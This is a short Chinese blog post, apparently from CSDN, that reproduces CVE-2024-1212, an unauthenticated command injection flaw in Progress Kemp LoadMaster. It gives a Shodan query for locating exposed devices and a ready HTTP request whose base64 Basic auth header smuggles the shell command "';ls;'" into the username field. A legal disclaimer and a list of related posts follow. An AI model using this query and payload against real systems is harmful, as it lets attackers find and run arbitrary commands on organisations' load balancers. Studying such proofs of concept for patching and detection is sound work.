【漏洞复现】Progress Kemp LoadMaster 命令注入漏洞(CVE-2024-1212)

0x01 产品简介

Progress Kemp LoadMaster是一款高性能的应用交付控制器,具有可扩展性,支持实体硬件和虚拟机的负载均衡。它提供了当今应用服务所需的各种功能,包括深度用户验证、资安防护(如WAF/IPS/DDoS防护)以及零信任架构服务。这款控制器旨在为各种规模的企业和单位提供出色的负载平衡和应用程序体验。

0x02 漏洞概述

复制代码
Progress Kemp LoadMaster存在命令注入漏洞,未经身份验证的远程攻击者可以通过 LoadMaster 管理界面访问系统,从而实现任意系统命令执行。

0x03 测绘语句

复制代码
shodan:html:"LoadMaster"

0x04 漏洞复现

漏洞复现:

复制代码
GET /access/set?param=enableapi&value=1 HTTP/1.1

Host:

Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=

0x05 影响范围

复制代码
LoadMaster > 7.2.48.1

0x06 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
googleccsdn1 分钟前
ENSP Pro Lab笔记:配置STP/RSTP/MSTP(4)
网络·笔记·网络协议
FairGuard手游加固16 分钟前
Cocos资源加密方案解析
安全·游戏·cocos2d
eeeasen34 分钟前
FnOS(0.9.32版本) --usb无线网卡(RTL8xxxu)调试
网络
2501_9387918343 分钟前
API 接口安全:用 JWT + Refresh Token 解决 Token 过期与身份伪造问题
安全
深盾安全43 分钟前
深入 Rust 错误处理:从新手到高手的进阶之路
安全
运维有小邓@1 小时前
如何生成随机密码保护新创建的用户帐户安全?
运维·安全·自动化
专家大圣1 小时前
5分钟启动标准化安卓环境:Docker-Android让模拟器配置不再踩坑
android·网络·docker·容器·内网穿透
七月稻草人1 小时前
Rust 中的路由匹配与参数提取:类型安全的 HTTP 路径解析艺术
安全·http·rust
国科安芯2 小时前
基于ASM1042通信接口芯片的两轮车充电机性能优化研究
服务器·网络·人工智能·单片机·嵌入式硬件·性能优化
R0ot2 小时前
面向安全增强的SSH版本升级实战指南
运维·安全·ssh